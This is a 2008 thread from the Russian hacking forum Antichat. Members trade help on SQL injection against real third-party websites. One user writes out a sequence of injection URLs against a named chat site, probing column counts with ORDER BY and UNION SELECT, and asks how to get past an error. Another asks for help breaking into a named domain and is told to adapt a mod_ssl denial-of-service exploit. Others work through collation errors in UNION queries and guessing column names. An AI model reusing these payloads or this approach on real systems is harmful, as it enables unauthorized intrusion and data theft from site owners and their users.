Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
13.04.2008, 19:16
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
bag
Это не обход шифрования
hex:unhex используют при проблемах с кодировкой.
Для этих-же целей используют ещё aes_decrypt:aes_encrypt или cast(_строка_+as+binary)
Эти функции преобразуют строку в нужную кодировку.Например
aes_encrypt шифрует строку с заданным ключом, а aes_decrypt дешифрует, на выходе получается результат в "правильной" кодировке.То-же самое делает пара hex:unhex только другим алгоритмом
|
|
|
13.04.2008, 19:21
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346
Репутация:
146
|
|
теперь все ясно, спасибо)))
|
|
|
|
14.04.2008, 03:35
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Так... Теперь я 
Попросили понюхать чат, но тута такая интересная скуля что разгодать её уже самому интересно...
Есть вот такая вот штука
_http://chat.besedka.com.ua/cgi-bin/info/user_info.cgi?nick=ALiN4iK!!!&action=view
пробуем
http://chat.besedka.com.ua/cgi-bin/info/user_info.cgi?nick=ALiN4iK!!! '&action=view
ошибка. Пробуем
_http://chat.besedka.com.ua/cgi-bin/info/user_info.cgi?nick=ALiN4iK!!!'+ORDER+BY+1/*&action=view
Катит. Пробуем
http://chat.besedka.com.ua/cgi-bin/info/user_info.cgi?nick=ALiN4iK!!!'+ORDER+BY+ 2/*&action=view
не катит, тоесть 1 колонка... Пробуем
_http://chat.besedka.com.ua/cgi-bin/info/user_info.cgi?nick='+UNION+SELECT+1/*&action=view
Грит у юзверя нет инфы, пробуем
http://chat.besedka.com.ua/cgi-bin/info/user_info.cgi?nick='+UNION+SELECT+ 2/*&action=view
Выводит нам кого-то, тоесть это ID юзверя, значит у нас есть запрос ... WHERE ID = 2
надо WHERE ID = 2+ORDER+BY+3/* (заранее скажу что там 3 колонки)
Делаем
_http://chat.besedka.com.ua/cgi-bin/info/user_info.cgi?nick='+UNION+SELECT+ '2+ORDER+BY+3/*'/*&action=view
Работает, делаем UNION+SELECT+1,2,3/*
_http://chat.besedka.com.ua/cgi-bin/info/user_info.cgi?nick='+UNION+SELECT+' 2+UNION+SELECT+1,2,3/*'/*&action=view
Ошибка 
Помогите разобраться |
|
|
|
14.04.2008, 06:11
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Ponchik, тут все просто, переменная nick имеет ограничение на длину (максимум 32 символа) все остальное просто обрубается и не идет в sql запрос, что и вызывает ошибку
Также скорее всего есть какая то фильтрация или даже проверка на intval описанная в статье Elekt`a правда у него там про php, но и здесь возможно тоже
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 14.04.2008 в 06:29..
|
|
|
|
14.04.2008, 17:52
|
|
Участник форума
Регистрация: 08.02.2008
Сообщений: 116
Провел на форуме:
1608432
Репутация:
158
|
|
помогите найти багу в www.doma.net.ua что только не пробовал все безполезно
|
|
|
|
14.04.2008, 20:44
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
А че их там искать ).Найди сплойт под дос на mod_ssl, переделай,если нуждается, и ебашь ).
|
|
|
|
14.04.2008, 20:46
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Нашел скулю. Сначало эта сволочь ругалась на
Error executing SQL query: Illegal mix of collations (cp1251_general_cs,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'. Please contact the servers system administrator.
Хрен с ней, перевел в "convert(version() using cp1251)"
Теперь выплывает:
Error executing SQL query: Illegal mix of collations for operation 'UNION'. Please contact the servers system administrator.
Колонок 7. Хорошо. Ставлю на 6 и мне выходит:
Error executing SQL query: The used SELECT statements have a different number of columns. Please contact the servers system administrator.
Допираю, что сервер запрещает функцию UNION...Как можно закодировать? |
|
|
|
14.04.2008, 20:51
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Сообщение от Ershik
Нашел скулю. Сначало эта сволочь ругалась на
Хрен с ней, перевел в "convert(version() using cp1251)"
Теперь выплывает:
Колонок 7. Хорошо. Ставлю на 6 и мне выходит:
Допираю, что сервер запрещает функцию UNION...Как можно закодировать?
Ниче подобного, не запрещает он юньку. Я где-то видел уже такое,и... )))
|
|
|
|
14.04.2008, 20:48
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
А вот такой вопрос - при запросе -1+union+select+1,2,3,4,5/* идёт ответ Ouknown column *xxxx*.Можно без поиска таблицы вбивать названия полей, чтобы угадать ?:РР.Ну, тобишь если вбивать поле user, и, если оно есть, высветится оное ? ).
|
|
|
|
14.04.2008, 20:53
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Ну не знаю..там с кодировкой траблы, может из-за
этого?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид